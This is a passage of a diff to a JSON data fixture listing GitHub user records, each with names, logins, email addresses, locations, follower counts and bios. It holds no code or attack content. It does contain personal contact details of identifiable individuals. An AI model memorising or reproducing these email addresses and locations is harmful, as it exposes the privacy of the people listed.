"company": "Crowdsec", - "location": "Paris", + "nest_created_at": "2024-09-22T07:43:09.050Z", + "nest_updated_at": "2024-09-22T18:45:40.580Z", + "name": "Jan Krivanek", + "login": "JanKrivanek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3809076?v=4", + "company": "@Microsoft", + "location": "", "collaborators_count": 0, - "following_count": 12, - "followers_count": 65, - "public_gists_count": 1, - "public_repositories_count": 16, - "created_at": "2011-06-07T12:55:34Z", - "updated_at": "2024-09-11T21:32:24Z", - "node_id": "MDQ6VXNlcjgzNTA2MA==", + "following_count": 2, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2013-03-08T13:26:30Z", + "updated_at": "2024-07-29T12:30:28Z", + "node_id": "MDQ6VXNlcjM4MDkwNzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388703,49 +645877,49 @@ }, { "model": "github.user", - "pk": 1139, + "pk": 6399, "fields": { - "nest_created_at": "2024-09-11T22:51:27.675Z", - "nest_updated_at": "2024-09-11T22:51:27.675Z", - "name": "Gary Stanley", - "login": "monkburger", - "email": "gary@cpanel.net", - "avatar_url": "https://avatars.githubusercontent.com/u/7066353?v=4", + "nest_created_at": "2024-09-22T07:43:09.669Z", + "nest_updated_at": "2024-09-22T18:45:57.334Z", + "name": "Karol", + "login": "karolswdev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50302144?v=4", "company": "", - "location": "", + "location": "Denver, Colorado", "collaborators_count": 0, - "following_count": 0, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2014-03-26T05:35:18Z", - "updated_at": "2024-07-11T15:57:25Z", - "node_id": "MDQ6VXNlcjcwNjYzNTM=", - "bio": "", - "is_hireable": false, + "following_count": 9, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 38, + "created_at": "2019-05-05T18:32:43Z", + "updated_at": "2024-09-20T12:05:08Z", + "node_id": "MDQ6VXNlcjUwMzAyMTQ0", + "bio": "I write code", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1140, + "pk": 6400, "fields": { - "nest_created_at": "2024-09-11T22:51:31.741Z", - "nest_updated_at": "2024-09-11T22:51:32.977Z", - "name": "Bastien", - "login": "zeylos", - "email": "b.ogier@protonmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/24226163?v=4", + "nest_created_at": "2024-09-22T07:43:10.000Z", + "nest_updated_at": "2024-09-22T18:45:41.552Z", + "name": "Benjamin Krämer", + "login": "Falco20019", + "email": "benjamin.kraemer@alien-scripts.de", + "avatar_url": "https://avatars.githubusercontent.com/u/940619?v=4", "company": "", - "location": "France", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 3, + "following_count": 6, + "followers_count": 20, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-11-28T13:26:11Z", - "updated_at": "2023-12-13T14:15:08Z", - "node_id": "MDQ6VXNlcjI0MjI2MTYz", + "public_repositories_count": 48, + "created_at": "2011-07-26T21:08:44Z", + "updated_at": "2024-09-20T08:13:12Z", + "node_id": "MDQ6VXNlcjk0MDYxOQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388753,49 +645927,49 @@ }, { "model": "github.user", - "pk": 1141, + "pk": 6401, "fields": { - "nest_created_at": "2024-09-11T22:51:36.278Z", - "nest_updated_at": "2024-09-11T22:51:36.278Z", - "name": "", - "login": "iMaxGit", + "nest_created_at": "2024-09-22T07:43:10.308Z", + "nest_updated_at": "2024-09-22T18:45:57.651Z", + "name": "June", + "login": "MangoFloat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9683389?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33149714?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 3, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-11-11T21:38:32Z", - "updated_at": "2024-09-04T10:29:26Z", - "node_id": "MDQ6VXNlcjk2ODMzODk=", - "bio": "", + "public_repositories_count": 7, + "created_at": "2017-10-27T09:16:35Z", + "updated_at": "2023-12-01T22:33:31Z", + "node_id": "MDQ6VXNlcjMzMTQ5NzE0", + "bio": "\"The darker the night, the brighter the stars.\"", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1142, + "pk": 6402, "fields": { - "nest_created_at": "2024-09-11T22:51:37.563Z", - "nest_updated_at": "2024-09-13T17:07:48.460Z", + "nest_created_at": "2024-09-22T07:43:10.621Z", + "nest_updated_at": "2024-09-22T18:45:42.179Z", "name": "", - "login": "Barnoux", + "login": "patspaeth", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47791676?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/80386770?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2019-02-19T17:56:31Z", - "updated_at": "2024-09-06T18:37:05Z", - "node_id": "MDQ6VXNlcjQ3NzkxNjc2", + "created_at": "2021-03-10T08:35:54Z", + "updated_at": "2022-08-30T06:12:37Z", + "node_id": "MDQ6VXNlcjgwMzg2Nzcw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388803,24 +645977,24 @@ }, { "model": "github.user", - "pk": 1143, + "pk": 6403, "fields": { - "nest_created_at": "2024-09-11T22:51:39.600Z", - "nest_updated_at": "2024-09-11T22:51:39.601Z", - "name": "Mohit Joshi", - "login": "joshi-mohit", + "nest_created_at": "2024-09-22T07:43:10.943Z", + "nest_updated_at": "2024-09-22T18:48:28.551Z", + "name": "Rodney Richardson", + "login": "RodneyRichardson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45808752?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4490952?v=4", "company": "", - "location": "", + "location": "Cambridge, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-12-12T03:32:48Z", - "updated_at": "2024-06-14T13:49:40Z", - "node_id": "MDQ6VXNlcjQ1ODA4NzUy", + "following_count": 1, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 23, + "created_at": "2013-05-21T15:59:35Z", + "updated_at": "2024-06-10T15:46:25Z", + "node_id": "MDQ6VXNlcjQ0OTA5NTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388828,74 +646002,74 @@ }, { "model": "github.user", - "pk": 1144, + "pk": 6404, "fields": { - "nest_created_at": "2024-09-11T22:51:40.470Z", - "nest_updated_at": "2024-09-11T22:51:40.470Z", - "name": "Something Else", - "login": "brijeshjvalera", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15683404?v=4", + "nest_created_at": "2024-09-22T07:43:11.261Z", + "nest_updated_at": "2024-09-22T18:47:09.694Z", + "name": "Davide Icardi", + "login": "davideicardi", + "email": "davide.icardi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/852570?v=4", "company": "", - "location": "", + "location": "Italy", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-11-06T05:23:33Z", - "updated_at": "2024-06-26T10:45:56Z", - "node_id": "MDQ6VXNlcjE1NjgzNDA0", - "bio": "#coder #foodie", - "is_hireable": false, + "followers_count": 64, + "public_gists_count": 57, + "public_repositories_count": 76, + "created_at": "2011-06-15T19:41:41Z", + "updated_at": "2024-09-10T15:07:22Z", + "node_id": "MDQ6VXNlcjg1MjU3MA==", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1145, + "pk": 6405, "fields": { - "nest_created_at": "2024-09-11T22:51:41.284Z", - "nest_updated_at": "2024-09-11T22:51:41.284Z", - "name": "BitsGuardian", - "login": "gassonet9", + "nest_created_at": "2024-09-22T07:43:11.583Z", + "nest_updated_at": "2024-09-22T18:45:43.156Z", + "name": "Kevin Jahrens", + "login": "killi199", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/150347486?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55409634?v=4", "company": "", - "location": "", + "location": "Wismar", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 12, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2023-11-09T11:49:15Z", - "updated_at": "2024-04-26T08:54:27Z", - "node_id": "U_kgDOCPYe3g", - "bio": "", + "public_repositories_count": 12, + "created_at": "2019-09-16T18:52:32Z", + "updated_at": "2024-08-23T12:06:55Z", + "node_id": "MDQ6VXNlcjU1NDA5NjM0", + "bio": "Studying Informatik M.Sc. at Hochschule Wismar", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1146, + "pk": 6406, "fields": { - "nest_created_at": "2024-09-11T22:51:42.497Z", - "nest_updated_at": "2024-09-11T22:51:42.497Z", - "name": "Mark Wakefield", - "login": "MrWako", + "nest_created_at": "2024-09-22T07:43:11.906Z", + "nest_updated_at": "2024-09-22T18:45:43.472Z", + "name": "", + "login": "stas-kachurovskyi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9511058?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/101387899?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 14, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2014-11-02T09:25:29Z", - "updated_at": "2024-04-25T20:07:36Z", - "node_id": "MDQ6VXNlcjk1MTEwNTg=", + "public_repositories_count": 6, + "created_at": "2022-03-11T07:27:33Z", + "updated_at": "2023-06-21T09:44:42Z", + "node_id": "U_kgDOBgsOew", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388903,49 +646077,49 @@ }, { "model": "github.user", - "pk": 1147, + "pk": 6407, "fields": { - "nest_created_at": "2024-09-11T22:51:43.304Z", - "nest_updated_at": "2024-09-18T18:54:46.565Z", - "name": "", - "login": "nanchen114", + "nest_created_at": "2024-09-22T07:43:12.568Z", + "nest_updated_at": "2024-09-22T18:45:58.269Z", + "name": "Stefano Tenuta", + "login": "ST-Apps", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59383756?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20584116?v=4", "company": "", - "location": "", + "location": "Italy", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 376, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-12-31T05:35:41Z", - "updated_at": "2023-03-26T14:09:10Z", - "node_id": "MDQ6VXNlcjU5MzgzNzU2", - "bio": "", + "public_repositories_count": 18, + "created_at": "2016-07-21T18:11:00Z", + "updated_at": "2024-09-17T11:31:48Z", + "node_id": "MDQ6VXNlcjIwNTg0MTE2", + "bio": "DevSecOps Engineer\r\n-\r\nCI/CD enthusiast", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1148, + "pk": 6408, "fields": { - "nest_created_at": "2024-09-11T22:51:44.565Z", - "nest_updated_at": "2024-09-11T22:51:44.565Z", - "name": "Yves Galante", - "login": "YvesZelros", + "nest_created_at": "2024-09-22T07:43:12.879Z", + "nest_updated_at": "2024-09-22T18:45:58.583Z", + "name": "Robert O'Callaghan", + "login": "rocallaghan-deluxe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/97048025?v=4", - "company": "@zelros ", + "avatar_url": "https://avatars.githubusercontent.com/u/55455181?v=4", + "company": "Deluxe Corporation", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2022-01-03T17:17:57Z", - "updated_at": "2024-04-04T14:54:20Z", - "node_id": "U_kgDOBcjV2Q", + "public_repositories_count": 1, + "created_at": "2019-09-17T16:30:10Z", + "updated_at": "2021-08-17T18:53:50Z", + "node_id": "MDQ6VXNlcjU1NDU1MTgx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388953,49 +646127,49 @@ }, { "model": "github.user", - "pk": 1149, + "pk": 6409, "fields": { - "nest_created_at": "2024-09-11T22:51:46.724Z", - "nest_updated_at": "2024-09-11T22:51:53.712Z", - "name": "s3rj1k", - "login": "s3rj1k", - "email": "evasive.gyron@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/11349489?v=4", + "nest_created_at": "2024-09-22T07:43:13.191Z", + "nest_updated_at": "2024-09-22T18:45:58.891Z", + "name": "Morgan Thrapp", + "login": "morganthrapp", + "email": "mpthrapp@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8458546?v=4", "company": "", - "location": "", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 20, - "followers_count": 36, - "public_gists_count": 2, - "public_repositories_count": 77, - "created_at": "2015-03-06T11:59:54Z", - "updated_at": "2024-05-22T22:29:14Z", - "node_id": "MDQ6VXNlcjExMzQ5NDg5", + "following_count": 1, + "followers_count": 5, + "public_gists_count": 4, + "public_repositories_count": 10, + "created_at": "2014-08-15T14:42:31Z", + "updated_at": "2023-08-29T19:09:33Z", + "node_id": "MDQ6VXNlcjg0NTg1NDY=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1150, + "pk": 6410, "fields": { - "nest_created_at": "2024-09-11T22:51:48.337Z", - "nest_updated_at": "2024-09-11T22:51:48.337Z", - "name": "Sylvain Muller", - "login": "tigerwill90", + "nest_created_at": "2024-09-22T07:43:13.513Z", + "nest_updated_at": "2024-09-22T18:45:59.233Z", + "name": "", + "login": "brianvu-dysi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26261762?v=4", - "company": "Fincons Group", - "location": "Switzerland, Geneva", + "avatar_url": "https://avatars.githubusercontent.com/u/59894428?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 9, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 42, - "created_at": "2017-03-07T21:58:56Z", - "updated_at": "2024-08-04T11:49:40Z", - "node_id": "MDQ6VXNlcjI2MjYxNzYy", + "public_repositories_count": 1, + "created_at": "2020-01-14T20:39:29Z", + "updated_at": "2020-03-11T20:13:00Z", + "node_id": "MDQ6VXNlcjU5ODk0NDI4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389003,24 +646177,24 @@ }, { "model": "github.user", - "pk": 1151, + "pk": 6411, "fields": { - "nest_created_at": "2024-09-11T22:51:52.122Z", - "nest_updated_at": "2024-09-11T22:51:52.122Z", + "nest_created_at": "2024-09-22T07:43:13.829Z", + "nest_updated_at": "2024-09-22T18:45:45.383Z", "name": "", - "login": "svenakela", + "login": "aristotelos", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1113187?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2814758?v=4", "company": "", - "location": "Hawai'i, Sweden", + "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 4, - "public_gists_count": 7, - "public_repositories_count": 26, - "created_at": "2011-10-08T22:53:20Z", - "updated_at": "2024-05-16T09:29:09Z", - "node_id": "MDQ6VXNlcjExMTMxODc=", + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2012-11-16T15:02:15Z", + "updated_at": "2024-08-30T05:50:34Z", + "node_id": "MDQ6VXNlcjI4MTQ3NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389028,24 +646202,24 @@ }, { "model": "github.user", - "pk": 1152, + "pk": 6412, "fields": { - "nest_created_at": "2024-09-11T22:51:52.909Z", - "nest_updated_at": "2024-09-11T22:51:52.909Z", + "nest_created_at": "2024-09-22T07:43:14.135Z", + "nest_updated_at": "2024-09-22T18:45:45.694Z", "name": "", - "login": "jabdr", + "login": "logicaloud", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/803604?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47704763?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2011-05-22T15:49:15Z", - "updated_at": "2024-08-07T17:23:58Z", - "node_id": "MDQ6VXNlcjgwMzYwNA==", + "public_repositories_count": 3, + "created_at": "2019-02-17T01:43:59Z", + "updated_at": "2024-07-18T03:19:37Z", + "node_id": "MDQ6VXNlcjQ3NzA0NzYz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389053,99 +646227,99 @@ }, { "model": "github.user", - "pk": 1153, + "pk": 6413, "fields": { - "nest_created_at": "2024-09-11T22:51:55.452Z", - "nest_updated_at": "2024-09-18T18:54:47.988Z", - "name": "Muhamad Surya Iksanudin", - "login": "ad3n", - "email": "surya.kejawen@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7464920?v=4", - "company": "@KejawenLab ", - "location": "Jakarta, Indonesia", + "nest_created_at": "2024-09-22T07:43:14.447Z", + "nest_updated_at": "2024-09-22T18:45:46.010Z", + "name": "", + "login": "dhivarson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74266131?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 180, - "public_gists_count": 26, - "public_repositories_count": 338, - "created_at": "2014-05-02T07:20:09Z", - "updated_at": "2024-08-14T14:17:06Z", - "node_id": "MDQ6VXNlcjc0NjQ5MjA=", - "bio": "Solution Architect, System Analyst, and Backend Developer\r\n", - "is_hireable": true, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-11-10T19:04:42Z", + "updated_at": "2024-05-03T02:13:59Z", + "node_id": "MDQ6VXNlcjc0MjY2MTMx", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1154, + "pk": 6414, "fields": { - "nest_created_at": "2024-09-11T22:52:24.182Z", - "nest_updated_at": "2024-09-18T18:54:49.585Z", - "name": "Daniel Gredler", - "login": "gredler", - "email": "daniel.gredler@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/178883?v=4", - "company": "", - "location": "Atlanta", + "nest_created_at": "2024-09-22T07:43:14.764Z", + "nest_updated_at": "2024-09-22T18:45:46.328Z", + "name": "Stéphane", + "login": "sescandell", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1559970?v=4", + "company": "Sociabble", + "location": "France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 8, - "public_gists_count": 1, - "public_repositories_count": 20, - "created_at": "2010-01-09T01:19:08Z", - "updated_at": "2024-08-31T21:14:27Z", - "node_id": "MDQ6VXNlcjE3ODg4Mw==", + "following_count": 8, + "followers_count": 16, + "public_gists_count": 6, + "public_repositories_count": 53, + "created_at": "2012-03-21T07:03:31Z", + "updated_at": "2024-09-13T08:35:49Z", + "node_id": "MDQ6VXNlcjE1NTk5NzA=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sescandell" } }, { "model": "github.user", - "pk": 1155, + "pk": 6415, "fields": { - "nest_created_at": "2024-09-11T22:52:27.524Z", - "nest_updated_at": "2024-09-18T18:54:55.261Z", - "name": "Raja Nagori", - "login": "RAJANAGORI", + "nest_created_at": "2024-09-22T07:43:15.086Z", + "nest_updated_at": "2024-09-22T18:45:46.655Z", + "name": "Shawn Meyer", + "login": "shawner18", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32300516?v=4", - "company": "Splunk", - "location": "Hyderabad, India", + "avatar_url": "https://avatars.githubusercontent.com/u/32966556?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 31, - "followers_count": 59, - "public_gists_count": 35, - "public_repositories_count": 54, - "created_at": "2017-09-26T13:06:17Z", - "updated_at": "2024-08-17T07:18:45Z", - "node_id": "MDQ6VXNlcjMyMzAwNTE2", - "bio": "Cyber Security Expert | Dev-Sec-Ops | Mobile App-Sec | Web App-Sec | Network VAPT | Automation", - "is_hireable": true, - "twitter_username": "RajaNagori7" + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2017-10-20T18:42:45Z", + "updated_at": "2024-08-17T13:48:51Z", + "node_id": "MDQ6VXNlcjMyOTY2NTU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1156, + "pk": 6416, "fields": { - "nest_created_at": "2024-09-11T22:52:36.142Z", - "nest_updated_at": "2024-09-11T22:52:54.722Z", - "name": "Jinesh Nagori", - "login": "jineshnagori", + "nest_created_at": "2024-09-22T07:43:15.394Z", + "nest_updated_at": "2024-09-22T18:46:02.080Z", + "name": "", + "login": "scorgatelli-docutech", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71936891?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/52677769?v=4", "company": "", - "location": "India ", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 40, - "public_gists_count": 1, - "public_repositories_count": 77, - "created_at": "2020-09-26T15:27:55Z", - "updated_at": "2024-08-26T12:17:06Z", - "node_id": "MDQ6VXNlcjcxOTM2ODkx", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-07-08T20:00:58Z", + "updated_at": "2020-01-24T22:51:02Z", + "node_id": "MDQ6VXNlcjUyNjc3NzY5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389153,74 +646327,74 @@ }, { "model": "github.user", - "pk": 1157, + "pk": 6417, "fields": { - "nest_created_at": "2024-09-11T22:52:57.894Z", - "nest_updated_at": "2024-09-11T22:52:57.894Z", - "name": "Shlok Pandit", - "login": "Dr-Savage", + "nest_created_at": "2024-09-22T07:43:15.712Z", + "nest_updated_at": "2024-09-22T18:45:47.285Z", + "name": "Nejc Habjan", + "login": "nejch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42646403?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16777978?v=4", + "company": "@siemens", + "location": "Zürich", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, + "following_count": 16, + "followers_count": 44, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2018-08-23T14:07:15Z", - "updated_at": "2024-09-02T07:47:28Z", - "node_id": "MDQ6VXNlcjQyNjQ2NDAz", - "bio": ".", - "is_hireable": true, + "public_repositories_count": 59, + "created_at": "2016-01-19T12:58:50Z", + "updated_at": "2024-09-18T16:20:10Z", + "node_id": "MDQ6VXNlcjE2Nzc3OTc4", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1158, + "pk": 6418, "fields": { - "nest_created_at": "2024-09-11T22:53:17.742Z", - "nest_updated_at": "2024-09-18T18:55:03.782Z", - "name": "Jeremy Druin", - "login": "webpwnized", + "nest_created_at": "2024-09-22T07:43:16.020Z", + "nest_updated_at": "2024-09-22T18:45:47.601Z", + "name": "Matthew Basson", + "login": "MattBasson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12465192?v=4", - "company": "Ellipsis Information Security LLC", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6450533?v=4", + "company": "LexisNexis", + "location": "London", "collaborators_count": 0, "following_count": 0, - "followers_count": 201, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2015-05-15T19:26:23Z", - "updated_at": "2024-09-15T11:29:43Z", - "node_id": "MDQ6VXNlcjEyNDY1MTky", + "public_repositories_count": 14, + "created_at": "2014-01-20T12:48:17Z", + "updated_at": "2024-04-05T21:48:14Z", + "node_id": "MDQ6VXNlcjY0NTA1MzM=", "bio": "", "is_hireable": false, - "twitter_username": "webpwnized" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1159, + "pk": 6419, "fields": { - "nest_created_at": "2024-09-11T22:53:20.628Z", - "nest_updated_at": "2024-09-18T18:54:59.852Z", - "name": "tanhx", - "login": "tanhx", - "email": "tan.hx@163.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1335838?v=4", + "nest_created_at": "2024-09-22T07:43:16.332Z", + "nest_updated_at": "2024-09-22T18:45:47.926Z", + "name": "", + "login": "Matiszak", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20770017?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2012-01-17T06:33:19Z", - "updated_at": "2024-04-24T08:23:17Z", - "node_id": "MDQ6VXNlcjEzMzU4Mzg=", + "public_repositories_count": 14, + "created_at": "2016-08-01T09:55:53Z", + "updated_at": "2024-09-08T12:06:04Z", + "node_id": "MDQ6VXNlcjIwNzcwMDE3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389228,24 +646402,49 @@ }, { "model": "github.user", - "pk": 1160, + "pk": 6420, "fields": { - "nest_created_at": "2024-09-11T22:53:21.460Z", - "nest_updated_at": "2024-09-13T05:21:06.901Z", - "name": "", - "login": "xxgumn", + "nest_created_at": "2024-09-22T07:43:16.642Z", + "nest_updated_at": "2024-09-22T18:45:48.241Z", + "name": "Mark Pattison", + "login": "markpattison", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/180929174?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9657374?v=4", "company": "", - "location": "", + "location": "Harpenden, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 4, + "followers_count": 15, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-09-09T07:55:49Z", - "updated_at": "2024-09-09T07:56:15Z", - "node_id": "U_kgDOCsjClg", + "public_repositories_count": 43, + "created_at": "2014-11-10T14:11:19Z", + "updated_at": "2024-05-02T16:21:54Z", + "node_id": "MDQ6VXNlcjk2NTczNzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "mark_pattison" + } +}, +{ + "model": "github.user", + "pk": 6421, + "fields": { + "nest_created_at": "2024-09-22T07:43:17.331Z", + "nest_updated_at": "2024-09-22T18:48:38.035Z", + "name": "M. Scott Ford", + "login": "mscottford", + "email": "scott@mscottford.com", + "avatar_url": "https://avatars.githubusercontent.com/u/21340?v=4", + "company": "Corgibytes LLC", + "location": "Richmond, VA", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 100, + "public_gists_count": 81, + "public_repositories_count": 143, + "created_at": "2008-08-21T02:03:12Z", + "updated_at": "2024-08-29T17:13:08Z", + "node_id": "MDQ6VXNlcjIxMzQw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389253,49 +646452,49 @@ }, { "model": "github.user", - "pk": 1161, + "pk": 6422, "fields": { - "nest_created_at": "2024-09-11T22:53:50.312Z", - "nest_updated_at": "2024-09-18T18:59:51.110Z", - "name": "CycloneDX SBOM Standard", - "login": "CycloneDX", + "nest_created_at": "2024-09-22T07:43:17.971Z", + "nest_updated_at": "2024-09-22T18:45:49.515Z", + "name": "", + "login": "Arthur-van-Dongen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29029855?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/102356422?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 493, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 57, - "created_at": "2017-05-29T01:46:39Z", - "updated_at": "2024-09-01T11:32:48Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjI5MDI5ODU1", - "bio": "CycloneDX is a modern standard for the software supply chain. SBOM, SaaSBOM, OBOM, Advisories, VEX, and more. CycloneDX is a OWASP Flagship Project.", + "public_repositories_count": 1, + "created_at": "2022-03-25T09:48:10Z", + "updated_at": "2023-04-03T13:55:24Z", + "node_id": "U_kgDOBhnVxg", + "bio": "", "is_hireable": false, - "twitter_username": "CycloneDX_Spec" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1162, + "pk": 6423, "fields": { - "nest_created_at": "2024-09-11T22:54:04.083Z", - "nest_updated_at": "2024-09-18T19:07:08.691Z", - "name": "Mark Symons", - "login": "msymons", + "nest_created_at": "2024-09-22T07:43:28.927Z", + "nest_updated_at": "2024-09-22T18:46:00.490Z", + "name": "Bálint József Jánvári", + "login": "dzsibi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4938718?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4534880?v=4", "company": "", - "location": "", + "location": "Budapest, Hungary", "collaborators_count": 0, - "following_count": 5, - "followers_count": 6, - "public_gists_count": 2, - "public_repositories_count": 15, - "created_at": "2013-07-04T10:08:07Z", - "updated_at": "2024-07-09T10:35:38Z", - "node_id": "MDQ6VXNlcjQ5Mzg3MTg=", + "following_count": 0, + "followers_count": 8, + "public_gists_count": 4, + "public_repositories_count": 17, + "created_at": "2013-05-26T20:49:31Z", + "updated_at": "2024-09-10T11:48:39Z", + "node_id": "MDQ6VXNlcjQ1MzQ4ODA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389303,49 +646502,49 @@ }, { "model": "github.user", - "pk": 1163, + "pk": 6424, "fields": { - "nest_created_at": "2024-09-11T22:54:08.185Z", - "nest_updated_at": "2024-09-18T18:59:43.580Z", - "name": "Matt Rutkowski", - "login": "mrutkows", - "email": "mrutkows@us.ibm.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7816715?v=4", - "company": "IBM", - "location": "Austin", + "nest_created_at": "2024-09-22T07:43:30.204Z", + "nest_updated_at": "2024-09-22T18:46:01.769Z", + "name": "Rui Carvalho", + "login": "carvalhorui84", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109536134?v=4", + "company": "", + "location": "Braga", 